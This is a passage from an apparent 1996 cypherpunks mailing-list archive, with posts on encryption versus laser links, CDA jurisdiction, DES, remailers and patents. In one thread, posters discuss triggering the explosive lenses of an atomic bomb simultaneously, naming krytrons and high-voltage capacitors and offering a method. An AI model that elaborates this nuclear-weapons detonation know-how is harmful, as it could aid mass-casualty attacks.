Subject: Re: Using lasers to communicate
In-Reply-To: <2.2.32.19960217230344.006adfa0@204.248.40.2>
Message-ID: <96Feb17.224435edt.950@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> If you have a secure link you don't need encryption.  Arguably, the
> converse is true; if you have secure encryption you don't need
> a secure link.  Isn't the ability to transmit secure data over
> insecure channels one of the primary justifications for encryption?
> 

Of course.  My point, though I seem to have failed to state it,
is that encryption is a cheap software thing while laser beams
are expensive, complicated, and still not secure.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 18 Feb 1996 14:22:07 +0800
To: cypherpunks@toad.com
Subject: Re: CyberAngels
Message-ID: <ad4bf93103021004c59c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:30 AM 2/15/96, Medea wrote:

>  I bet if you use the word "cryptology" in a sentence, the CyberAsses
>would have no idea what you were taking about.

"Cripology?"

"Oh, yeah, dat be da study of da Crips, one of da gangs we be protectin' da
peeples against."


--Curtis Sliwa







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Sun, 18 Feb 1996 15:45:50 +0800
To: mianignad@outlook.net
Subject: Re: Legal status of Indian Reservations and CDA
Message-ID: <199602180722.XAA02079@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 06:03 PM 2/17/96 +0000, you wrote:
>If I remember correctly, are not American Indian reservations considered 
>qusi-sovergin states under the law?

Indian tribes no longer function as sovereigns - they're considered domestic
dependent nations. The lack of *state* (CA, OR, WA, etc) jurisdiction over
Indian country comes from federal preemption. Tribes retain some civil
regulatory jurisdiction, but it does not function to exclude federal
regulation. (see http://darkwing.uoregon.edu/~gbroiles/torres.html for more
re tribal regulatory jurisdiction)

>If this is true, what would stop me from negotiating with some tribe to 
>establish an ISP on the reservation and then placing whatever material I
>wanted on that site without fear of reprisals from the US goverment.

The problem with this is that the feds have jurisdiction over crimes
occurring within Indian country. Tribes may also exercise jurisdiction over
tribal members who violate tribal law. ( * Modulo PL-280, modulo the civil
rights act of 1968, which gave and took away and gave back (sort of)
criminal jurisdiction to the states in 5 states - CA, OR, WA, MN, NE (?),
and other states/tribes who choose to opt into PL-280's framework. Yow.)

Doing business within Indian country won't help you escape Federal law;
Federal law enforcement is often the local law enforcement. 

(State jurisdiction over gambling, jurisdiction over taxation of economic
transactions, and criminal jurisdiction should be considered independently;
they are all created or extinguished by different Federal statutes,
sometimes state-by-state, sometimes tribe-by-tribe. Also, the Pueblos of New
Mexico and Arizona(?) may have a different status because they gained their
land from the government of Mexico.)

Jurisdictional questions under Federal Indian law are always messy. If it
was as easy as "do it on a reservation", people would've been doing it for
years with drugs & alcohol. But the Feds thought of that already. 

--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Sun, 18 Feb 1996 13:10:34 +0800
To: cypherpunks@toad.com
Subject: Re: Legal status of Indian Reservations and CDA
Message-ID: <199602180433.XAA25416@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Michael Peponis wrote:
> If I remember correctly, are not American Indian reservations considered
> qusi-sovergin states under the law?

Yes and no. Sometimes states are able to go after then for taxes in terms 
of money made from non-Indians.  NYS complains about people going to
reservations to buy cheap cigarettes, for instance, and wants taxes
collected from non-Indians.

I think the Iran-Contra flap involved using a reservation in Calif.
to get around some weapons manufacturing or exporting laws. Not sure,
though.

> If this is true, what would stop me from negotiating with some tribe to
> establish an ISP on the reservation and then placing whatever material I wanted
> on that site without fear of reprisals from the US goverment.

The tribe.  They may not be too happy about an ISP on their territory
carrying porno, neo-nazi literature or even crypto...

Actually, they may look down upon any business deal meant to circumvent
US laws, since it can get them into an unpleasant conflict with the
gov't.  It would be an altogether different situation if they wanted to
start their own ISP though...

Beware of exploiting poor people on Indian reservations or elsewhere
on the planet just to be outside of the laws.  Even if it seems for a
good cause to you, the locals may not look to favorably.

> After all, if they are a soveign state, decency is covered by whatever laws
> they have, if any, not the CDA.

Their own laws may be stricter. Much stricter.

Also, what about the receiver? Or the receiver's ISP?  Erotic materials
are legal in plenty of countries, but can't the receiver get in trouble?
As soon as people see the flawed logic in the Amateur Action BBS case,
that's the take they'll go for... and it's back to square one.

Rob.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSasCCoZzwIn1bdtAQFwZgGAyPIqr9h4dKNfPFgt/3I3n8qIRvoe4lM7
Lcd6Zsp12hcO9Dbckn202L6O1Qjxy+yi
=dY6I
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 18 Feb 1996 12:40:13 +0800
To: Dave Farber <farber@central.cis.upenn.edu>
Subject: Re: A Cyberspace Independence Refutation
In-Reply-To: <2.2.32.19960217235252.00ce4398@linc.cis.upenn.edu>
Message-ID: <Pine.BSF.3.91.960217233246.26862Q-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Feb 1996, Dave Farber wrote:

> The President can not rule anything unconstitutional. He can tell justice
> not to enforce it but sometime local federal prosecutors do what they want

U.S. Attorneys serve at the pleasure of the President.  U.S. Attorneys 
cannot fire their Assistants -- they can only recommend such action to 
the Attorney General or the Deputy Attorney General.

EBD

> and some future administration can decide to enforce it. Only the courts or
> the congress can change things for sure.
> 
> Dave
> 
> At 03:20 PM 2/17/96 -0800, jamesd@echeque.com wrote:
> >jamesd@echeque.com said:
> >>
> >>j> 1.  President Clinton declared CDA unconstitutional and directed
> >>j> the Justice department to refrain from enforcing it.
> >
> >At 01:57 PM 2/16/96 -0600, Sten Drescher wrote:
> >>	Then why is the Justice Department defending it? 
> >
> >Sorry:  My error.  As you pointed out he ruled *part* of the
> >CDA unconstitutional -- a part that no one expected to be
> >enforced anyway
> > ---------------------------------------------------------------------
> >              				|  
> >We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> >and our property, because of the kind	|  
> >of animals that we are. True law	|   James A. Donald
> >derives from this right, not from the	|  
> >arbitrary power of the state.		|   jamesd@echeque.com
> >
> >
> >
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sun, 18 Feb 1996 13:07:30 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Some thoughts on the Chinese Net
In-Reply-To: <199602171820.NAA12476@pipe11.nyc.pipeline.com>
Message-ID: <199602180435.XAA24397@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


tallpaul writes: 
[re: hypothetical Chinese IP address-based filtering]
> Assuming this system is estabished, then we would want to modify our
> remailers to strip IP packet information as well as normal header, no? 

I'm not entirely sure what you mean. Present remailers don't save anything
except for (parts of) RFC 822 message bodies, and occasionally some SMTP
mail headers. Certainly no packet-level headers (like IP) are saved at all.

Presumably The Chinese Wall (and many other gateways, routers, etc.) would
simply drop any packets that managed to arrive without originating IP address
information. You could use something that emits packets with "incorrect" /
"forged" IP headers, but that crosses an ethical line that I consider rather
important not to cross. The IPsec WG has been working on interhost 
authentication that should render the point moot, anyway.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ericd@shop.internet.net (Eric Davis)
Date: Sun, 18 Feb 1996 15:55:38 +0800
To: dsmith@midwest.net (David E. Smith)
Subject: Re: Using lasers to communicate
Message-ID: <v02130503ad4c7ab7db8a@[205.179.23.30]>
MIME-Version: 1.0
Content-Type: text/plain




That URL should be: httpd://www.lasercomm/lasercomm

Eric

P.S. Thanks John for pointing this out!

At 8:42 PM 2/17/96, Eric Davis wrote:
>Woooa there....
>
>Lasers are not exactly expensive or complicated....
>
>Check out www.lasercomm.com. 4-15Mb/s lasers.
>or Cannon 10-100Mb/s lasers.
>
>I have installed these products *many* times and their setup and operation
>is fast and efficient. (used to work for Interop)
>
>Exmaple:
>We used a pair of these, and MBONE, to provide a 2 way real time video
>confrence link joining an IETF session between a room of
>users at Japan Interop (local) and a group in Sweeden (IETF). The setup
>a was last minute point to point Ethernet link from the confrence center
>to a local hotel acress the road. We had 1.5 hours to perform ALL
>of the work, from wiring both roofs, seting up the lasers, wiring
>the internal hotel/confrence center, and setting up systems and projectors.
>!!The Laser setup took about :15 minutes, tops!!
>
>BTW: With this system the transmit "beam" is focused into a "spot" half
>way between the sending and receiving units. The receiving unit
>is tuned to look for that focused "spot". This means that there is a
>very large (area wise) low power laser pattern behind each of the
>receivers! With a sensitive enough receiver, it is possible to hear
>this signal!
>
>When you need to transport a data stream (1-155Mb/s) to a remote
>site, this solution works out to be *MUCH* cheaper than leasing
>circuits from bell, bypass folks, etc..
>
>Another case in point: We (ISN) needed to transport a 100Mb/s (FDDI) between \
>2 sites. Upon checking, the price of PacBell "dim" fiber was outrageous!
>We had no MFS/TCG/etc fiber in the man hole to latch onto. The choice was
>clear.
>
>As for security, the bottom line is that encryption devices are cheap.
>
>Last plus for these units is that most foreign countries do not prevent
>the use of these point to point optical devices. This is not the case
>for spread spectrum multipoint or microwave point to point radio devices.
>
>Eric Davis
>
>
>
>At 10:44 PM 2/17/96, SINCLAIR  DOUGLAS N wrote:
>>> If you have a secure link you don't need encryption.  Arguably, the
>>> converse is true; if you have secure encryption you don't need
>>> a secure link.  Isn't the ability to transmit secure data over
>>> insecure channels one of the primary justifications for encryption?
>>>
>>
>>Of course.  My point, though I seem to have failed to state it,
>>is that encryption is a cheap software thing while laser beams
>>are expensive, complicated, and still not secure.
>
>-------------------------------------------------------------
>Eric Davis -- ericd@internet.net
>Director, Information Systems
>Internet Shopping Network -- http://www.internet.net/
>415-846-7449 Voice -- 415-842-7415 Fax -- KD6HTO Radio
>-------------------------------------------------------------
>- One by one our rights are taken, One by one we loose our
>- freedom. Step by step we're coming for them, One by one
>- we're coming. - Inka Inka - Myth of the Machine - Step Back

-------------------------------------------------------------
Eric Davis -- ericd@internet.net
Director, Information Systems
Internet Shopping Network -- http://www.internet.net/
415-846-7449 Voice -- 415-842-7415 Fax -- KD6HTO Radio
-------------------------------------------------------------
- One by one our rights are taken, One by one we loose our
- freedom. Step by step we're coming for them, One by one
- we're coming. - Inka Inka - Myth of the Machine - Step Back







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Sun, 18 Feb 1996 14:07:01 +0800
To: cypherpunks@toad.com
Subject: Re: DES_ono
Message-ID: <9602180502.AA03842@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


Two brief questions about DES, if I may.

I have heard of a couple of rumours that DES is considered to be fairly weak.  
Specifically, the rumors mentioned that there were some questions about the 
design of the S-boxes and the possibility that there was a trap door which 
would permit the NSA or other gov't agency to quickly obtain the cleartext.

Another rumour was that the French & Israeli intelligence agencies downgraded
the classification of DES to one of the lowest strengths of encryption
algorithms.

I have been wondering about these issues off & on for a while & have tried to 
do some research on them, but have come up with nothing which would amount to 
more than hearsay.  It's tough to tell if the rumours stem from urban legends 
or are based on fact.

If it isn't too much trouble, I'd appreciate an expert opinion of the two 
rumours mentioned above.

Assuming the rumours of the weakness of DES are true, which symmetric
encryption algorithms would you recommend which are substantially more
secure than DES (and which are obtainable from Internet or commercial
sources)?  (It doesn't haver to be exportable).

Thanks in advance for your help.

Best Regards,


Frank
<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified
Home of the Free Internet Firewall Evaluation Checklist







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mailer-Daemon@ig4.att.att.com
Date: Sun, 18 Feb 1996 14:05:46 +0800
To: cypherpunks@toad.com
Subject: Returned mail: Host unknown (Name server: ncr-sd.sdca.attgis.com.: host not found)
Message-ID: <199602180505.AAA01560@ncrhub7.attgis.com>
MIME-Version: 1.0
Content-Type: text/plain


The original message was received at Sun, 18 Feb 1996 00:05:33 -0500 (EST)
from ncrgw1@localhost

   ----- The following addresses have delivery notifications -----
sandiegoca.ncr.com!chris.claborne  (unrecoverable error)

   ----- Transcript of session follows -----
550 sandiegoca.ncr.com!chris.claborne... Host unknown (Name server: ncr-sd.sdca.attgis.com.: host not found)

   ----- Message header follows -----

Return-Path: cypherpunks@toad.com
Received: from ncrgw1.UUCP (ncrgw1@localhost) by ncrhub7.attgis.com (8.7.3/8.7.3) with UUCP id AAA01559 for sandiegoca.ncr.com!chris.claborne; Sun, 18 Feb 1996 00:05:33 -0500 (EST)
Received: by ncrgw1.ATTGIS.COM; 18 Feb 96 00:05:15 EST
Received: from toad.com by relay3.UU.NET with SMTP 
	id QQadkd19489; Sat, 17 Feb 1996 23:59:52 -0500 (EST)
Received: by toad.com id AA23859; Sat, 17 Feb 96 20:35:58 PST
Received: from cs.umass.edu (freya.cs.umass.edu) by toad.com id AA23846; Sat, 17 Feb 96 20:35:53 PST
Received: from thor.cs.umass.edu by cs.umass.edu (5.65/Ultrix3.0-C)
	id AA00548; Sat, 17 Feb 1996 23:35:51 -0500
Received: (from lmccarth@localhost) by thor.cs.umass.edu (8.6.12/8.6.9) id XAA24397 for cypherpunks@toad.com; Sat, 17 Feb 1996 23:35:50 -0500
From: lmccarth@cs.umass.edu
Message-Id: <199602180435.XAA24397@thor.cs.umass.edu>
Subject: Re: Some thoughts on the Chinese Net
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Date: Sat, 17 Feb 1996 23:35:50 -0500 (EST)
Reply-To: cypherpunks@toad.com (Cypherpunks Mailing List)
In-Reply-To: <199602171820.NAA12476@pipe11.nyc.pipeline.com> from "tallpaul" at Feb 17, 96 01:20:06 pm
X-Mailer: ELM [version 2.4 PL25]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-cypherpunks@toad.com
Precedence: bulk

   ----- Message body suppressed -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sun, 18 Feb 1996 14:36:31 +0800
To: Asgaard <asgaard@sos.sll.se>
Subject: Re: CDA outside US (Including Indian Reservations)
In-Reply-To: <Pine.HPP.3.91.960218050207.9955A-100000@cor.sos.sll.se>
Message-ID: <Pine.3.89.9602180046.A14320-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 18 Feb 1996, Asgaard wrote:

> The problem with the CDA in this regard is that it doesn't seem to
> respect other jurisdictions. It's very irritating for us in other
> countries to know that if we put 'indecent' material on our world
> readable sites, then we commit a crime in the US punishable with
> 2 years detention, even if chances of prosecution, extradition or
> Noriega-style international arrest are minimal - so far; we all

Another problem - if you ever want to get into the US, you can kiss that
chance goodbye.  They might not even let you into the country as a
visitor.  Stupid.  A fair number of Western countries have laws that say,
in effect, that if you do something in your country that isn't illegal in
your country but is in country X, then country X can bar you entry or PR
status or citizenship based on the fact that is *is* a crome in country X. 

Never mind that you may not even be aware that it *is* a crime in another
country, etc.  I suspect that it's intended to bar war criminals and such,
but it could just as easily be used against the common immigrant. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sun, 18 Feb 1996 14:37:43 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <m0to1K0-0008yqC@pacifier.com>
Message-ID: <Pine.3.89.9602180025.B14320-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Feb 1996, jim bell wrote:

> At 07:13 PM 2/17/96 +0000, Ed Carp wrote:
> >On Sat, 17 Feb 1996, jim bell wrote:
> >
> >> BTW, I think I've already solved the problem of producing a few dozen 
> >> absolutely simultaneous trigger explosions (+/- 100 nanoseconds) around the 
> >> periphery at the lens foci, without using multiple electronic detonators.  
> >> (in fact, a single blasting cap would do nicely.)  "But the margins of this 
> >> book are too small to contain it"  Heh heh!
> >
> >Actually, it's a quite simple problem to solve.  Tom Clancy used a rather 
> >more complicated method, but the idea was correct.
> 
> You might be surprised:  I have never read anything by Clancy.  Tell me,
> what method did HE use?

A single electronic timer.  The lengths of wire from the timer/detonator
to each piece of explosive was exact - thus, the pulse reached each piece
of explosive at the same time. 

I think Clancy used multiple timers, each triggered at the same time.  I
don't think that one would need but one timer, though. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 18 Feb 1996 15:33:59 +0800
To: asgaard@sos.sll.se>
Subject: Denying Entrance Visas to Troublemakers
Message-ID: <ad4c0e4904021004badd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:08 AM 2/18/96, Ed Carp wrote:

>Another problem - if you ever want to get into the US, you can kiss that
>chance goodbye.  They might not even let you into the country as a
>visitor.  Stupid.  A fair number of Western countries have laws that say,
>in effect, that if you do something in your country that isn't illegal in
>your country but is in country X, then country X can bar you entry or PR
>status or citizenship based on the fact that is *is* a crome in country X.
>
>Never mind that you may not even be aware that it *is* a crime in another
>country, etc.  I suspect that it's intended to bar war criminals and such,
>but it could just as easily be used against the common immigrant.

Oh, but it is done very, very often. That is, it is not something reserved
for "war criminals" (not that war criminals are excluded, as shown by the
Dayton Accords, and other visits.)

"Denied entry" and "undesirable" are the operative words. The offense may
be writing materials critical of the U.S. (poetry, novels, etc....so far,
not Net stuff). Various flavors of activists, writers, critics, etc. are
often denied visas to enter the U.S.

I don't believe the Net has yet registered on the Richter scale of visa
grantings, but I suspect it will within a couple of years, both because the
Net will become a more important media channel and because it will be so
easy to compile lists of folks who will be denied entrance visas.

(And the same applies in reverse. I have no doubt that I will be denied
visas to enter various countries, including the freedom-loving countries of
the mullahs and sheiks, and that country which sent Pollard to spy on the
U.S. Good thing I don't want to visit any of them, except Iraq.)

--Tim May



Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 18 Feb 1996 08:42:57 +0800
To: cypherpunks@toad.com
Subject: Patents suck
Message-ID: <199602180006.BAA22725@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Jean-Francois Avon (JFA Technologies, QC, Canada) wrote:
> Man's survival tool is his mind.
> 
> Patents and copyright are establishing the ownership and protection
> the result of the exercise of his survival tool.
> 
> Therefore they are good.
> 
> To try to eliminate them is equivalent to promote slavery.

I take some disagreement with that.

With patents, there is a problem of large companies owning them yet
doing nothing with them except suing other companies or individuals.
For example, look at arithmetic coding: there are many patents owned
on it, yet a lot of software using this means of compression may be in
violation of the patents... are the patent-owners publishing software
or makingh efforts to license it widely?  If anything, such patents
are getting in the way of using many algorithms.

Patents would be better if there was a good-faith attempt on the
part of the holder to "use it or lose it".  Somebody sitting on a
patent and doing nothing with it deserves to lose it after a number
of years.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 19 Feb 1996 13:56:21 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: Online Zakat Payment: Religious tithe.
Message-ID: <m0to5Hb-0008xzC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:12 AM 2/18/96 +0000, Ed Carp wrote:
>On Sat, 17 Feb 1996, jim bell wrote:
>
>> At 07:13 PM 2/17/96 +0000, Ed Carp wrote:
>> >On Sat, 17 Feb 1996, jim bell wrote:
>> >
>> >> BTW, I think I've already solved the problem of producing a few dozen 
>> >> absolutely simultaneous trigger explosions (+/- 100 nanoseconds)
around the 
>> >> periphery at the lens foci, without using multiple electronic
detonators.  
>> >> (in fact, a single blasting cap would do nicely.)  "But the margins of
this 
>> >> book are too small to contain it"  Heh heh!
>> >
>> >Actually, it's a quite simple problem to solve.  Tom Clancy used a rather 
>> >more complicated method, but the idea was correct.
>> 
>> You might be surprised:  I have never read anything by Clancy.  Tell me,
>> what method did HE use?
>
>A single electronic timer.  The lengths of wire from the timer/detonator
>to each piece of explosive was exact - thus, the pulse reached each piece
>of explosive at the same time. 
>
>I think Clancy used multiple timers, each triggered at the same time.  I
>don't think that one would need but one timer, though. 
>--
>Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com

<sigh>   It really isn't as simple as that!  What I mean is this:  It sounds
like Clancy doesn't really understand much about the requirements to trigger
explosives to detonate an atomic bomb.  

Where do I begin?  The big problem is getting all the explosions to occur at
basically the same instant; ideally, well under a microsecond accuracy.
Well, it turns out that if you just want to trigger a single blasting cap,
only a little current does it.  But the exact time delay of the explosion is
related to the amount of energy applied to the cap.  Put "just enough" power
into it, and it goes in a few hundred milliseconds, but you don't know
EXACTLY when.  Put A LOT MORE into it and the delay is not only shorter, but
also better defined.  While I've never been exposed to specific numbers, in
order to get the explosions REALLY simultaneously normally is thought to
require two types of unusual devices not normally encountered:  High voltage
coaxial capacitors and krytron tubes.  The combination of the two puts a
HUGE amount of energy into each cap, essentially instantaneously, and they
all go off more or less simultaneously.

All this is sophisticated and difficult to deal with.  I've developed a
method that uses materials commonly available in the average medium-size
city, and with the exception of a single blasting cap, are extremely
innocuous to purchase.  I'd be happy to share the information, if there are
no strong objections from the peanut gallery.

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSbjMvqHVDBboB2dAQG0AAQAkO+D4mzyaBNOVaKbaQ/wMBB/l1U3qHI4
lESrdffXQp1FdwYN7DxesUNR88772MloAiumu8oXFnwPV8+OSr/E7ZBhFZzDuF9V
LHuWgZIRoCazbsa82HAHG/YTBqLB7Lf/Hg+9DlKXGSMf+x7oJFnfMXb/rn8r8gzL
toc+Qj9w0D4=
=rx0O
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Nobody" <mixmaster@anon.alias.net>
Date: Sun, 18 Feb 1996 17:02:02 +0800
To: jis@mit.edu.cypherpunks@toad.com
Subject: None
In-Reply-To: <9602180318.AA22007@big-screw>
Message-ID: <199602180835.CAA12858@fuqua.fiftysix.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <9602180318.AA22007@big-screw> jis@mit.edu (Jeffrey I. Schiller) writes:

> The keyserver running at pgp@pgp.mit.edu is once again operational. It is
> using new keyserver software. The old keyserver software was a collection
> of perl scripts that invoked PGP to do its key management. The new server
> is written in "C" and does its own key management, complete with appropriate
> indices.

Is source code for this C server available?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Sun, 18 Feb 1996 21:10:35 +0800
To: cypherpunks@toad.com
Subject: Re: China -- the fragile glimmer of freedom
Message-ID: <2.2.32.19960218125403.00692de4@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 AM 2/17/96 -0800, Timothy May wrote:

>Well, where are the posts from outraged Cypherpunks living in the People's
>Republic of China?

In many cases, exercising the prudence appropriate to people whose friends
have been run over by tanks in recent years.

In other cases, doing things in venues that happen not to cross this list.
In much of China the central government is already a dead letter, with
effective power being wielded at the municipial and provincial level.
Friends of my family who do business in China report that the major question
at this point is making sure that local military authorities don't decide to
confiscate all the assets of prospering businesses. Part of this is very
strong security for sensitive transactions.

I can't know for sure, obviously, but I'd be unsurprised to find as many
copies of PGP running in regions like Shanghai, Shenzen, and Guangzhou as
there are in the United States.

A lot of these folks don't have good net connectively, and won't for a long
time. Some of them have it but are leery of posting critical stuff that will
attract hostile attention. Others are, for all I know, protesting in
relevant soc.culture groups and such places. It's very easy to develop an
inflated sense of the importance of the forums one happens to belong to -
Cypherpunks isn't all that widely known, and even though it is, or at least
has been, an outstanding gathering of folks making crypto happen, there are
other vectors for these things.

>are in the so-called "Western world." We have a chance to deploy strong
>crypto, the residents of Nepal and Singapore do not.

As it happens, I _do_ know for a fact of at least one copy of PGP running in
Nepal, in the hands of a agricultural broker.

Tim, you're beyond your knowledge here.

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Sun, 18 Feb 1996 21:15:43 +0800
To: cypherpunks@toad.com
Subject: Monthly Remailer Perfs, Prelims
Message-ID: <2.2.32.19960218125834.0067933c@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm in the process of running what I guess will be my monthly series of
remailer tests, where I send posts through a given remailer to a nym at c2
and then back through the remailer to me. While it'll be most of a week
before I'm done, some preliminary observations.

- armadillo and hroller are sorely missed.

- remailer@valhalla.phoenix.net is, so I'm told, not a valid address. And I
get a failure to find the host name at wmono@spook.alias.net. Anyone want to
shed light on this?

- performance is noticeably slower throughout. In January I routinely got
messages back in five to ten minutes. Now the shortest round trip is about
fifty minutes. Is the load on the remailers that much higher, or are other
factors at work?

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: maruishi@netcom.com
Date: Sun, 18 Feb 1996 21:35:43 +0800
To: Olmur <olmur@dwarf.bb.bawue.de>
Subject: Re: True random numbers
In-Reply-To: <m0to6rJ-0006DcC@dwarf>
Message-ID: <Pine.3.89.9602180536.A21600-0100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 18 Feb 1996, Olmur wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >>>>> "M" == maruishi  <maruishi@netcom.com> writes:
> 
> M> Maybe another "random" source XORed with this? I don't know, just a
> M> though.
> 
> Somewhere during developement of the Linux 1.3.* kernel a
> "(pseudo-)random-number device" was introduced.  Perhaps the sources
> of this can give you some ideas.
> 
> Have a nice day!
> 
> Olmur
> - --
> "If privacy is outlawed, only outlaws will have privacy" --- P. Zimmermann
>       Please encipher your mail!  Contact me, if you need assistance.
> 
> finger -l mdeindl@eisbaer.bb.bawue.de for PGP-key
>          Key-fingerprint: 51 EC A5 D2 13 93 8F 91  CB F7 6C C4 F8 B5 B6 7C
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3i
> Charset: latin1
> Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface
> 
> iQCVAwUBMScG1Q9NARnYm1I1AQENqgP+O0qeiuyzYDBDsEgLxcy4e5eC1VVgskda
> G45Gow9JHXzLuK+rV9SRLJFXRppM6mgQySop6SvikI+aCraKQK+XsqQEatQPdBHd
> cGm5cw9wHf5PGEjmOksmRonbeh+y7AoNqkdwnSLD8NW4823pEKR7fPMB+UCcZj/g
> xyhY42kUWvs=
> =CSca
> -----END PGP SIGNATURE-----
> 


thanx I'll keep that in mind.

maruishi@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carson.chittom@starnetbbs.com (Carson Chittom)
Date: Mon, 19 Feb 1996 10:07:43 +0800
To: cypherpunks@toad.com
Subject: Books
Message-ID: <9602181915317383@starnetbbs.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


To all:
        I have a deep interest in my privacy, and, therefore, in cryptography.
However, I do not know the slightest thing about encryption.  Could anyone
recommend any sources that would be understandable?  Ideally, I'd like to
have books, but I can bum off a friend's account if necessary (mine is an
